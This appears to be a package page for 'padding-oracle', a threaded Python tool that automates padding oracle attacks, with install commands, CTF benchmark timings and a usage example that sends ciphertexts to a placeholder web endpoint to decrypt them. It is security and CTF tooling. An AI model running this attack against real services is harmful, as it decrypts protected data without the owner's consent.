padding-oracle

Threaded padding oracle automation.


Keywords
cipher, crypto, cryptography, ctf, ctf-tools, hacking, hacking-tool, padding-oracle, padding-oracle-attacks, web-security
License
MIT
Install
pip install padding-oracle==0.1.6

Documentation

padding_oracle.py

Extremely fast threaded padding oracle automation script for Python 3.

Install

Installing from PyPI:

pip3 install -U padding_oracle

Or, installing from GitHub:

pip3 install -U git+https://github.com/djosix/padding_oracle.py.git

Performance

Tested on [0x09] Cathub Party from EDU-CTF:

Request Threads Execution Time
1 17m 43s
4 5m 23s
16 1m 20s
64 56s

Example

All you need is defining the oracle function to check whether the given cipher is correctly decrypted.

from padding_oracle import *

import requests

# Create a requests.Session to enable connection pool
sess = requests.Session()

# Define a function to test if the cipher can be decrypted
def oracle(cipher):
    resp = sess.post('http://some-website.com/decrypt',
                     data={'cipher': base64_encode(cipher)}).text
    assert 'Good' in resp or 'Bad' in resp, 'Exception?'
    return 'Good' in resp


cipher = b'[______IV______][____Block1____][____Block2____]'


# DECRYPT THE CIPHER!!!
plaintext = padding_oracle(cipher,
                           block_size=16,
                           oracle=oracle,
                           num_threads=64)